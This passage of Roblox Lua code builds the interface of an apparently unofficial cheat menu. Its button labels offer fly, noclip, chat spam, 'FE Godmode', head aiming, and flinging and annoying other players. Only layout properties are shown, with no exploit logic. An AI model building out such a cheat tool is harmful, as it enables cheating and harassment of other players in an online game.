Enum.FontSize.Size28 heroictitle.Text = "Heroic" heroictitle.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) heroictitle.TextSize = 25 swordstrike.Name = "swordstrike" swordstrike.Parent = Animations_HEROIC swordstrike.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) swordstrike.BorderSizePixel = 0 swordstrike.Position = UDim2.new(0, 0, 0.238476187, 0) swordstrike.Size = UDim2.new(1, 0, 0.119000003, 0) swordstrike.Font = Enum.Font.SourceSans swordstrike.FontSize = Enum.FontSize.Size14 swordstrike.Text = "Sword Strike" swordstrike.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) swordstrike.TextScaled = true swordstrike.TextSize = 14 swordstrike.TextWrapped = true jumpland.Name = "jumpland" jumpland.Parent = Animations_HEROIC jumpland.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) jumpland.BorderSizePixel = 0 jumpland.Position = UDim2.new(0, 0, 0.3875238, 0) jumpland.Size = UDim2.new(1, 0, 0.119000003, 0) jumpland.Font = Enum.Font.SourceSans jumpland.FontSize = Enum.FontSize.Size14 jumpland.Text = "Jump Land" jumpland.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) jumpland.TextScaled = true jumpland.TextSize = 14 jumpland.TextWrapped = true punches.Name = "punches" punches.Parent = Animations_HEROIC punches.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) punches.BorderSizePixel = 0 punches.Position = UDim2.new(0, 0, 0.834666669, 0) punches.Size = UDim2.new(1, 0, 0.119000003, 0) punches.Font = Enum.Font.SourceSans punches.FontSize = Enum.FontSize.Size14 punches.Text = "Punches" punches.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) punches.TextScaled = true punches.TextSize = 14 punches.TextWrapped = true swing.Name = "swing" swing.Parent = Animations_HEROIC swing.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) swing.BorderSizePixel = 0 swing.Position = UDim2.new(0, 0, 0.536571383, 0) swing.Size = UDim2.new(1, 0, 0.119000003, 0) swing.Font = Enum.Font.SourceSans swing.FontSize = Enum.FontSize.Size14 swing.Text = "Swing" swing.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) swing.TextScaled = true swing.TextSize = 14 swing.TextWrapped = true crawl.Name = "crawl" crawl.Parent = Animations_HEROIC crawl.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) crawl.BorderSizePixel = 0 crawl.Position = UDim2.new(0, 0, 0.685619056, 0) crawl.Size = UDim2.new(1, 0, 0.119000003, 0) crawl.Font = Enum.Font.SourceSans crawl.FontSize = Enum.FontSize.Size14 crawl.Text = "Crawl" crawl.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) crawl.TextScaled = true crawl.TextSize = 14 crawl.TextWrapped = true Char2_Image.Name = "Char2_Image" Char2_Image.Parent = Character_2 Char2_Image.BackgroundColor3 = Color3.new(1, 1, 1) Char2_Image.BackgroundTransparency = 1 Char2_Image.Position = UDim2.new(0.792435288, 0, 0.0219649114, 0) Char2_Image.Size = UDim2.new(0.101884536, 0, 0.197684199, 0) Char2_Image.Image = "http://www.roblox.com/asset/?id=1282931168" Character_1.Name = "Character_1" Character_1.Parent = Pages Character_1.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Character_1.BorderSizePixel = 0 Character_1.Position = UDim2.new(11, 0, 0, 0) Character_1.Size = UDim2.new(1, 0, 1, 0) CharacterTitle_2.Name = "CharacterTitle" CharacterTitle_2.Parent = Character_1 CharacterTitle_2.BackgroundColor3 = Color3.new(1, 1, 1) CharacterTitle_2.BackgroundTransparency = 1 CharacterTitle_2.Position = UDim2.new(0.226410091, 0, 0, 0) CharacterTitle_2.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) CharacterTitle_2.Font = Enum.Font.SourceSansBold CharacterTitle_2.FontSize = Enum.FontSize.Size28 CharacterTitle_2.Text = "Character" CharacterTitle_2.TextSize = 25 Char_Image_2.Name = "Char_Image" Char_Image_2.Parent = Character_1 Char_Image_2.BackgroundColor3 = Color3.new(1, 1, 1) Char_Image_2.BackgroundTransparency = 1 Char_Image_2.Position = UDim2.new(0.0792435333, 0, 0.109824568, 0) Char_Image_2.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Char_Image_2.Image = "http://www.roblox.com/asset/?id=1281299598" CharacterText_2.Name = "CharacterText" CharacterText_2.Parent = Character_1 CharacterText_2.BackgroundColor3 = Color3.new(1, 1, 1) CharacterText_2.BackgroundTransparency = 1 CharacterText_2.Position = UDim2.new(0.147166565, 0, 0.109824568, 0) CharacterText_2.Size = UDim2.new(0.679230273, 0, 0.175719291, 0) CharacterText_2.Font = Enum.Font.SourceSansItalic CharacterText_2.FontSize = Enum.FontSize.Size24 CharacterText_2.Text = "Change your character's speed and other stats, give yourself fly, noclip and more!" CharacterText_2.TextSize = 19 CharacterText_2.TextWrapped = true TXTBOX_Stats.Name = "TXTBOX_Stats" TXTBOX_Stats.Parent = Character_1 TXTBOX_Stats.BackgroundColor3 = Color3.new(0.956863, 0.968628, 0.972549) TXTBOX_Stats.BorderColor3 = Color3.new(0.152941, 0.682353, 0.376471) TXTBOX_Stats.BorderSizePixel = 6 TXTBOX_Stats.Position = UDim2.new(0.0905640349, 0, 0.373403519, 0) TXTBOX_Stats.Size = UDim2.new(0.18112807, 0, 0.0878596455, 0) TXTBOX_Stats.Font = Enum.Font.SourceSans TXTBOX_Stats.FontSize = Enum.FontSize.Size14 TXTBOX_Stats.Text = "Number" TXTBOX_Stats.TextScaled = true TXTBOX_Stats.TextSize = 14 TXTBOX_Stats.TextWrapped = true BackGroundChar.Name = "BackGroundChar" BackGroundChar.Parent = Character_1 BackGroundChar.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) BackGroundChar.BorderSizePixel = 0 BackGroundChar.Position = UDim2.new(0.0769999996, 0, 0.48300001, 0) BackGroundChar.Size = UDim2.new(0, 92, 0, 118) HipHeight.Name = "HipHeight" HipHeight.Parent = BackGroundChar HipHeight.BackgroundColor3 = Color3.new(0.180392, 0.8, 0.443137) HipHeight.BorderSizePixel = 0 HipHeight.Position = UDim2.new(0, 0, 0.679050863, 0) HipHeight.Size = UDim2.new(0, 92, 0, 25) HipHeight.Font = Enum.Font.SourceSans HipHeight.FontSize = Enum.FontSize.Size24 HipHeight.Text = "HipHeight" HipHeight.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) HipHeight.TextSize = 22 JumpHeight.Name = "JumpHeight" JumpHeight.Parent = BackGroundChar JumpHeight.BackgroundColor3 = Color3.new(0.180392, 0.8, 0.443137) JumpHeight.BorderSizePixel = 0 JumpHeight.Position = UDim2.new(0, 0, 0.381966084, 0) JumpHeight.Size = UDim2.new(0, 92, 0, 25) JumpHeight.Font = Enum.Font.SourceSans JumpHeight.FontSize = Enum.FontSize.Size24 JumpHeight.Text = "JumpHeight" JumpHeight.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) JumpHeight.TextSize = 20 Speed.Name = "Speed" Speed.Parent = BackGroundChar Speed.BackgroundColor3 = Color3.new(0.180392, 0.8, 0.443137) Speed.BorderSizePixel = 0 Speed.Position = UDim2.new(0, 0, 0.0848813578, 0) Speed.Size = UDim2.new(0, 92, 0, 25) Speed.Font = Enum.Font.SourceSans Speed.FontSize = Enum.FontSize.Size24 Speed.Text = "Speed" Speed.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Speed.TextSize = 22 TXTBOX_Chat.Name = "TXTBOX_Chat" TXTBOX_Chat.Parent = Character_1 TXTBOX_Chat.BackgroundColor3 = Color3.new(0.956863, 0.968628, 0.972549) TXTBOX_Chat.BorderColor3 = Color3.new(0.152941, 0.682353, 0.376471) TXTBOX_Chat.BorderSizePixel = 6 TXTBOX_Chat.Position = UDim2.new(0.384897143, 0, 0.373403519, 0) TXTBOX_Chat.Size = UDim2.new(0.520743191, 0, 0.0878596455, 0) TXTBOX_Chat.Font = Enum.Font.SourceSans TXTBOX_Chat.FontSize = Enum.FontSize.Size14 TXTBOX_Chat.Text = "Text for chatting" TXTBOX_Chat.TextScaled = true TXTBOX_Chat.TextSize = 14 TXTBOX_Chat.TextWrapped = true BackGroundChar2.Name = "BackGroundChar2" BackGroundChar2.Parent = Character_1 BackGroundChar2.BackgroundColor3 = Color3.new(0.152941, 0.682353, 0.376471) BackGroundChar2.BorderSizePixel = 0 BackGroundChar2.Position = UDim2.new(0.370000005, 0, 0.48300001, 0) BackGroundChar2.Size = UDim2.new(0, 242, 0, 40) Chat.Name = "Chat" Chat.Parent = BackGroundChar2 Chat.BackgroundColor3 = Color3.new(0.180392, 0.8, 0.443137) Chat.BorderSizePixel = 0 Chat.Position = UDim2.new(0.0620288812, 0, 0.125200003, 0) Chat.Size = UDim2.new(0, 92, 0, 25) Chat.Font = Enum.Font.SourceSans Chat.FontSize = Enum.FontSize.Size24 Chat.Text = "Chat" Chat.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Chat.TextSize = 22 Spam_2.Name = "Spam" Spam_2.Parent = BackGroundChar2 Spam_2.BackgroundColor3 = Color3.new(0.180392, 0.8, 0.443137) Spam_2.BorderSizePixel = 0 Spam_2.Position = UDim2.new(0.558259964, 0, 0.125200003, 0) Spam_2.Size = UDim2.new(0, 92, 0, 25) Spam_2.Font = Enum.Font.SourceSans Spam_2.FontSize = Enum.FontSize.Size24 Spam_2.Text = "Spam" Spam_2.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Spam_2.TextSize = 22 BackGroundChar3.Name = "BackGroundChar3" BackGroundChar3.Parent = Character_1 BackGroundChar3.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) BackGroundChar3.BorderSizePixel = 0 BackGroundChar3.Position = UDim2.new(0.372000009, 0, 0.742999971, 0) BackGroundChar3.Size = UDim2.new(0, 242, 0, 43) Noclip.Name = "Noclip" Noclip.Parent = BackGroundChar3 Noclip.BackgroundColor3 = Color3.new(0.101961, 0.737255, 0.611765) Noclip.BorderSizePixel = 0 Noclip.Position = UDim2.new(0.558000028, 0, 0.208000004, 0) Noclip.Size = UDim2.new(0, 92, 0, 25) Noclip.Font = Enum.Font.SourceSans Noclip.FontSize = Enum.FontSize.Size24 Noclip.Text = "Noclip" Noclip.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Noclip.TextSize = 22 Fly.Name = "Fly" Fly.Parent = BackGroundChar3 Fly.BackgroundColor3 = Color3.new(0.101961, 0.737255, 0.611765) Fly.BorderSizePixel = 0 Fly.Position = UDim2.new(0.061999999, 0, 0.208000004, 0) Fly.Size = UDim2.new(0, 92, 0, 25) Fly.Font = Enum.Font.SourceSans Fly.FontSize = Enum.FontSize.Size24 Fly.Text = "Fly" Fly.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Fly.TextSize = 22 Character_toPAGE2.Name = "Character_toPAGE2" Character_toPAGE2.Parent = Character_1 Character_toPAGE2.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE2.BorderSizePixel = 0 Character_toPAGE2.Position = UDim2.new(0.819999993, 0, 0.0439999998, 0) Character_toPAGE2.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Character_toPAGE2.Font = Enum.Font.SourceSansLight Character_toPAGE2.FontSize = Enum.FontSize.Size24 Character_toPAGE2.Text = "Next" Character_toPAGE2.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Character_toPAGE2.TextSize = 22 Character_toPAGE2_IMAGE_2.Name = "Character_toPAGE2_IMAGE" Character_toPAGE2_IMAGE_2.Parent = Character_toPAGE2 Character_toPAGE2_IMAGE_2.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE2_IMAGE_2.BorderSizePixel = 0 Character_toPAGE2_IMAGE_2.Position = UDim2.new(0.900659323, 0, 0, 0) Character_toPAGE2_IMAGE_2.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE2_IMAGE_2.Image = "http://www.roblox.com/asset/?id=1282737326" Others_2.Name = "Others_2" Others_2.Parent = Pages Others_2.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Others_2.BorderSizePixel = 0 Others_2.Position = UDim2.new(1, 0, 0, 0) Others_2.Size = UDim2.new(1, 0, 1, 0) OthersTitle_2.Name = "OthersTitle" OthersTitle_2.Parent = Others_2 OthersTitle_2.BackgroundColor3 = Color3.new(1, 1, 1) OthersTitle_2.BackgroundTransparency = 1 OthersTitle_2.Position = UDim2.new(0.226410091, 0, 0, 0) OthersTitle_2.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) OthersTitle_2.Font = Enum.Font.SourceSansBold OthersTitle_2.FontSize = Enum.FontSize.Size28 OthersTitle_2.Text = "Others" OthersTitle_2.TextSize = 25 Other_Image2.Name = "Other_Image2" Other_Image2.Parent = Others_2 Other_Image2.BackgroundColor3 = Color3.new(1, 1, 1) Other_Image2.BackgroundTransparency = 1 Other_Image2.Position = UDim2.new(0.0113205044, 0, 0.197684199, 0) Other_Image2.Size = UDim2.new(0.101884536, 0, 0.197684199, 0) Other_Image2.Image = "http://www.roblox.com/asset/?id=1284941440" OthersText_2.Name = "OthersText" OthersText_2.Parent = Others_2 OthersText_2.BackgroundColor3 = Color3.new(1, 1, 1) OthersText_2.BackgroundTransparency = 1 OthersText_2.Position = UDim2.new(0.203769073, 0, 0.109824568, 0) OthersText_2.Size = UDim2.new(0.577345729, 0, 0.175719291, 0) OthersText_2.Font = Enum.Font.SourceSansItalic OthersText_2.FontSize = Enum.FontSize.Size24 OthersText_2.Text = "Use rocket propulsion to push, fling, and annoy players!" OthersText_2.TextSize = 19 OthersText_2.TextWrapped = true TXTBOX_PlrName2.Name = "TXTBOX_PlrName2" TXTBOX_PlrName2.Parent = Others_2 TXTBOX_PlrName2.BackgroundColor3 = Color3.new(0.956863, 0.968628, 0.972549) TXTBOX_PlrName2.BorderColor3 = Color3.new(0.152941, 0.682353, 0.376471) TXTBOX_PlrName2.BorderSizePixel = 0 TXTBOX_PlrName2.Position = UDim2.new(0.249051109, 0, 0.395368397, 0) TXTBOX_PlrName2.Size = UDim2.new(0.520743191, 0, 0.0878596455, 0) TXTBOX_PlrName2.ZIndex = 2 TXTBOX_PlrName2.Font = Enum.Font.SourceSans TXTBOX_PlrName2.FontSize = Enum.FontSize.Size14 TXTBOX_PlrName2.Text = "Player" TXTBOX_PlrName2.TextScaled = true TXTBOX_PlrName2.TextSize = 14 TXTBOX_PlrName2.TextWrapped = true othersBaseBackground2.Name = "othersBaseBackground2" othersBaseBackground2.Parent = Others_2 othersBaseBackground2.BackgroundColor3 = Color3.new(0.556863, 0.266667, 0.678431) othersBaseBackground2.BorderSizePixel = 0 othersBaseBackground2.Position = UDim2.new(0.124525554, 0, 0.351438582, 0) othersBaseBackground2.Size = UDim2.new(0.769999981, 0, 0.649999976, 0) Flatten.Name = "Flatten" Flatten.Parent = othersBaseBackground2 Flatten.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) Flatten.BorderSizePixel = 0 Flatten.Position = UDim2.new(0.0588666238, 0, 0.27070269, 0) Flatten.Size = UDim2.new(0, 92, 0, 25) Flatten.Font = Enum.Font.SourceSans Flatten.FontSize = Enum.FontSize.Size24 Flatten.Text = "Flatten" Flatten.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Flatten.TextSize = 22 AimHead.Name = "AimHead" AimHead.Parent = othersBaseBackground2 AimHead.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) AimHead.BorderSizePixel = 0 AimHead.Position = UDim2.new(0.367916405, 0, 0.27070269, 0) AimHead.Size = UDim2.new(0, 92, 0, 25) AimHead.Font = Enum.Font.SourceSans AimHead.FontSize = Enum.FontSize.Size24 AimHead.Text = "Aim Head" AimHead.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) AimHead.TextSize = 22 Float.Name = "Float" Float.Parent = othersBaseBackground2 Float.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) Float.BorderSizePixel = 0 Float.Position = UDim2.new(0.0588666238, 0, 0.507567585, 0) Float.Size = UDim2.new(0, 92, 0, 25) Float.Font = Enum.Font.SourceSans Float.FontSize = Enum.FontSize.Size24 Float.Text = "Float" Float.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Float.TextSize = 22 Multiple.Name = "Multiple" Multiple.Parent = othersBaseBackground2 Multiple.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) Multiple.BorderSizePixel = 0 Multiple.Position = UDim2.new(0.367916405, 0, 0.507567585, 0) Multiple.Size = UDim2.new(0, 92, 0, 25) Multiple.Font = Enum.Font.SourceSans Multiple.FontSize = Enum.FontSize.Size24 Multiple.Text = "Multiple" Multiple.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Multiple.TextSize = 22 Animated.Name = "Animated" Animated.Parent = othersBaseBackground2 Animated.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) Animated.BorderSizePixel = 0 Animated.Position = UDim2.new(0.67696619, 0, 0.27070269, 0) Animated.Size = UDim2.new(0, 92, 0, 25) Animated.Font = Enum.Font.SourceSans Animated.FontSize = Enum.FontSize.Size24 Animated.Text = "Animated" Animated.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Animated.TextSize = 22 SlowAttract.Name = "SlowAttract" SlowAttract.Parent = othersBaseBackground2 SlowAttract.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) SlowAttract.BorderSizePixel = 0 SlowAttract.Position = UDim2.new(0.67696619, 0, 0.507567585, 0) SlowAttract.Size = UDim2.new(0, 92, 0, 25) SlowAttract.Font = Enum.Font.SourceSans SlowAttract.FontSize = Enum.FontSize.Size24 SlowAttract.Text = "SlowAttract" SlowAttract.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) SlowAttract.TextSize = 22 WeirdOrbit.Name = "WeirdOrbit" WeirdOrbit.Parent = othersBaseBackground2 WeirdOrbit.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) WeirdOrbit.BorderSizePixel = 0 WeirdOrbit.Position = UDim2.new(0.67696619, 0, 0.744432449, 0) WeirdOrbit.Size = UDim2.new(0, 92, 0, 25) WeirdOrbit.Font = Enum.Font.SourceSans WeirdOrbit.FontSize = Enum.FontSize.Size24 WeirdOrbit.Text = "Weird Orbit" WeirdOrbit.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) WeirdOrbit.TextSize = 22 Violent.Name = "Violent" Violent.Parent = othersBaseBackground2 Violent.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) Violent.BorderSizePixel = 0 Violent.Position = UDim2.new(0.367916405, 0, 0.744432449, 0) Violent.Size = UDim2.new(0, 92, 0, 25) Violent.Font = Enum.Font.SourceSans Violent.FontSize = Enum.FontSize.Size24 Violent.Text = "Violent" Violent.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Violent.TextSize = 22 Max.Name = "Max" Max.Parent = othersBaseBackground2 Max.BackgroundColor3 = Color3.new(0.607843, 0.34902, 0.713726) Max.BorderSizePixel = 0 Max.Position = UDim2.new(0.0588666238, 0, 0.744432449, 0) Max.Size = UDim2.new(0, 92, 0, 25) Max.Font = Enum.Font.SourceSans Max.FontSize = Enum.FontSize.Size24 Max.Text = "Max" Max.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Max.TextSize = 22 Others_toPAGE3.Name = "Others_toPAGE3" Others_toPAGE3.Parent = Others_2 Others_toPAGE3.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Others_toPAGE3.BorderSizePixel = 0 Others_toPAGE3.Position = UDim2.new(0.819999993, 0, 0.0439999998, 0) Others_toPAGE3.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Others_toPAGE3.Font = Enum.Font.SourceSansLight Others_toPAGE3.FontSize = Enum.FontSize.Size24 Others_toPAGE3.Text = "Next" Others_toPAGE3.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Others_toPAGE3.TextSize = 22 Character_toPAGE3_IMAGE.Name = "Character_toPAGE3_IMAGE" Character_toPAGE3_IMAGE.Parent = Others_toPAGE3 Character_toPAGE3_IMAGE.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE3_IMAGE.BorderSizePixel = 0 Character_toPAGE3_IMAGE.Position = UDim2.new(0.900659323, 0, 0, 0) Character_toPAGE3_IMAGE.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE3_IMAGE.Image = "http://www.roblox.com/asset/?id=1282737326" Others_backPAGE1.Name = "Others_backPAGE1" Others_backPAGE1.Parent = Others_2 Others_backPAGE1.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Others_backPAGE1.BorderSizePixel = 0 Others_backPAGE1.Position = UDim2.new(0.0679230243, 0, 0.0439298227, 0) Others_backPAGE1.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Others_backPAGE1.Font = Enum.Font.SourceSansLight Others_backPAGE1.FontSize = Enum.FontSize.Size24 Others_backPAGE1.Text = "Prev" Others_backPAGE1.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Others_backPAGE1.TextSize = 22 Character_toPAGE1_IMAGE_2.Name = "Character_toPAGE1_IMAGE" Character_toPAGE1_IMAGE_2.Parent = Others_backPAGE1 Character_toPAGE1_IMAGE_2.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE1_IMAGE_2.BorderSizePixel = 0 Character_toPAGE1_IMAGE_2.Position = UDim2.new(-0.400293052, 0, 0, 0) Character_toPAGE1_IMAGE_2.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE1_IMAGE_2.Image = "http://www.roblox.com/asset/?id=1282894968" Extra_1.Name = "Extra_1" Extra_1.Parent = Pages Extra_1.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Extra_1.BorderSizePixel = 0 Extra_1.Position = UDim2.new(1, 0, 0, 0) Extra_1.Size = UDim2.new(1, 0, 1, 0) Extra_Image.Name = "Extra_Image" Extra_Image.Parent = Extra_1 Extra_Image.BackgroundColor3 = Color3.new(1, 1, 1) Extra_Image.BackgroundTransparency = 1 Extra_Image.Position = UDim2.new(0.0679230243, 0, 0.0439298227, 0) Extra_Image.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Extra_Image.Image = "http://www.roblox.com/asset/?id=1281477720" ExtraText.Name = "ExtraText" ExtraText.Parent = Extra_1 ExtraText.BackgroundColor3 = Color3.new(1, 1, 1) ExtraText.BackgroundTransparency = 1 ExtraText.Position = UDim2.new(0.158487067, 0, 0.109824568, 0) ExtraText.Size = UDim2.new(0.65658927, 0, 0.0878596455, 0) ExtraText.Font = Enum.Font.SourceSansItalic ExtraText.FontSize = Enum.FontSize.Size24 ExtraText.Text = "Cool and unique commands for yourself!" ExtraText.TextSize = 19 ExtraText.TextWrapped = true ExtraBaseBackGround1.Name = "ExtraBaseBackGround1" ExtraBaseBackGround1.Parent = Extra_1 ExtraBaseBackGround1.BackgroundColor3 = Color3.new(0.945098, 0.768628, 0.0588235) ExtraBaseBackGround1.BorderSizePixel = 0 ExtraBaseBackGround1.Position = UDim2.new(0.0790000036, 0, 0.400000006, 0) ExtraBaseBackGround1.Size = UDim2.new(0.25, 0, 0.600000024, 0) CrouchRocket.Name = "CrouchRocket" CrouchRocket.Parent = ExtraBaseBackGround1 CrouchRocket.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) CrouchRocket.BorderSizePixel = 0 CrouchRocket.Position = UDim2.new(0.0901560932, 0, 0.0731094852, 0) CrouchRocket.Size = UDim2.new(0, 92, 0, 25) CrouchRocket.Font = Enum.Font.SourceSans CrouchRocket.FontSize = Enum.FontSize.Size18 CrouchRocket.Text = "Crouch Rocket" CrouchRocket.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) CrouchRocket.TextSize = 17 ExtraBaseBackGround1Side.Name = "ExtraBaseBackGround1Side" ExtraBaseBackGround1Side.Parent = ExtraBaseBackGround1 ExtraBaseBackGround1Side.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) ExtraBaseBackGround1Side.BorderSizePixel = 0 ExtraBaseBackGround1Side.Position = UDim2.new(0, 0, -0.109664232, 0) ExtraBaseBackGround1Side.Size = UDim2.new(1, 0, 0.109999999, 0) CloneIllusion.Name = "CloneIllusion" CloneIllusion.Parent = ExtraBaseBackGround1 CloneIllusion.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) CloneIllusion.BorderSizePixel = 0 CloneIllusion.Position = UDim2.new(0.0901560932, 0, 0.292437941, 0) CloneIllusion.Size = UDim2.new(0, 92, 0, 25) CloneIllusion.Font = Enum.Font.SourceSans CloneIllusion.FontSize = Enum.FontSize.Size18 CloneIllusion.Text = "Clone Illusion" CloneIllusion.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) CloneIllusion.TextSize = 17 CoolSpin.Name = "CoolSpin" CoolSpin.Parent = ExtraBaseBackGround1 CoolSpin.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) CoolSpin.BorderSizePixel = 0 CoolSpin.Position = UDim2.new(0.0901560932, 0, 0.511766434, 0) CoolSpin.Size = UDim2.new(0, 92, 0, 25) CoolSpin.Font = Enum.Font.SourceSans CoolSpin.FontSize = Enum.FontSize.Size18 CoolSpin.Text = "Cool Spin" CoolSpin.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) CoolSpin.TextSize = 17 JumpRocket.Name = "JumpRocket" JumpRocket.Parent = ExtraBaseBackGround1 JumpRocket.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) JumpRocket.BorderSizePixel = 0 JumpRocket.Position = UDim2.new(0.0901560932, 0, 0.731094897, 0) JumpRocket.Size = UDim2.new(0, 92, 0, 25) JumpRocket.Font = Enum.Font.SourceSans JumpRocket.FontSize = Enum.FontSize.Size18 JumpRocket.Text = "Jump Rocket" JumpRocket.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) JumpRocket.TextSize = 17 Extra_toPAGE2.Name = "Extra_toPAGE2" Extra_toPAGE2.Parent = Extra_1 Extra_toPAGE2.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Extra_toPAGE2.BorderSizePixel = 0 Extra_toPAGE2.Position = UDim2.new(0.819999993, 0, 0.0439999998, 0) Extra_toPAGE2.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Extra_toPAGE2.Font = Enum.Font.SourceSansLight Extra_toPAGE2.FontSize = Enum.FontSize.Size24 Extra_toPAGE2.Text = "Next" Extra_toPAGE2.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Extra_toPAGE2.TextSize = 22 Character_toPAGE2_IMAGE_3.Name = "Character_toPAGE2_IMAGE" Character_toPAGE2_IMAGE_3.Parent = Extra_toPAGE2 Character_toPAGE2_IMAGE_3.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE2_IMAGE_3.BorderSizePixel = 0 Character_toPAGE2_IMAGE_3.Position = UDim2.new(0.900659323, 0, 0, 0) Character_toPAGE2_IMAGE_3.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE2_IMAGE_3.Image = "http://www.roblox.com/asset/?id=1282737326" Extra_Title.Name = "Extra_Title" Extra_Title.Parent = Extra_1 Extra_Title.BackgroundColor3 = Color3.new(1, 1, 1) Extra_Title.BackgroundTransparency = 1 Extra_Title.Position = UDim2.new(0.226410091, 0, 0, 0) Extra_Title.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) Extra_Title.Font = Enum.Font.SourceSansBold Extra_Title.FontSize = Enum.FontSize.Size28 Extra_Title.Text = "Extra" Extra_Title.TextSize = 25 ExtraBaseBackGround2.Name = "ExtraBaseBackGround2" ExtraBaseBackGround2.Parent = Extra_1 ExtraBaseBackGround2.BackgroundColor3 = Color3.new(0.101961, 0.737255, 0.611765) ExtraBaseBackGround2.BorderSizePixel = 0 ExtraBaseBackGround2.Position = UDim2.new(0.374000013, 0, 0.400000006, 0) ExtraBaseBackGround2.Size = UDim2.new(0.25, 0, 0.600000024, 0) NoLimbs.Name = "NoLimbs" NoLimbs.Parent = ExtraBaseBackGround2 NoLimbs.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) NoLimbs.BorderSizePixel = 0 NoLimbs.Position = UDim2.new(0.0901560932, 0, 0.0731094852, 0) NoLimbs.Size = UDim2.new(0, 92, 0, 25) NoLimbs.Font = Enum.Font.SourceSans NoLimbs.FontSize = Enum.FontSize.Size18 NoLimbs.Text = "No Limbs" NoLimbs.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) NoLimbs.TextSize = 17 FEGodmode.Name = "FE Godmode" FEGodmode.Parent = ExtraBaseBackGround2 FEGodmode.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) FEGodmode.BorderSizePixel = 0 FEGodmode.Position = UDim2.new(0.0901560932, 0, 0.292437941, 0) FEGodmode.Size = UDim2.new(0, 92, 0, 25) FEGodmode.Font = Enum.Font.SourceSans FEGodmode.FontSize = Enum.FontSize.Size18 FEGodmode.Text = "FE Godmode" FEGodmode.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) FEGodmode.TextSize = 17 BrickHats.Name = "BrickHats" BrickHats.Parent = ExtraBaseBackGround2 BrickHats.BackgroundColor3 = Color3.new(0.0862745, 0.627451, 0.521569) BrickHats.BorderSizePixel = 0 BrickHats.Position = UDim2.new(0.0901560932, 0, 0.511766434, 0) BrickHats.Size = UDim2.new(0, 92, 0, 25) BrickHats.Font = Enum.Font.SourceSans BrickHats.FontSize = Enum.FontSize.Size18 BrickHats.Text = "Brick Hats" BrickHats.TextColor3 = 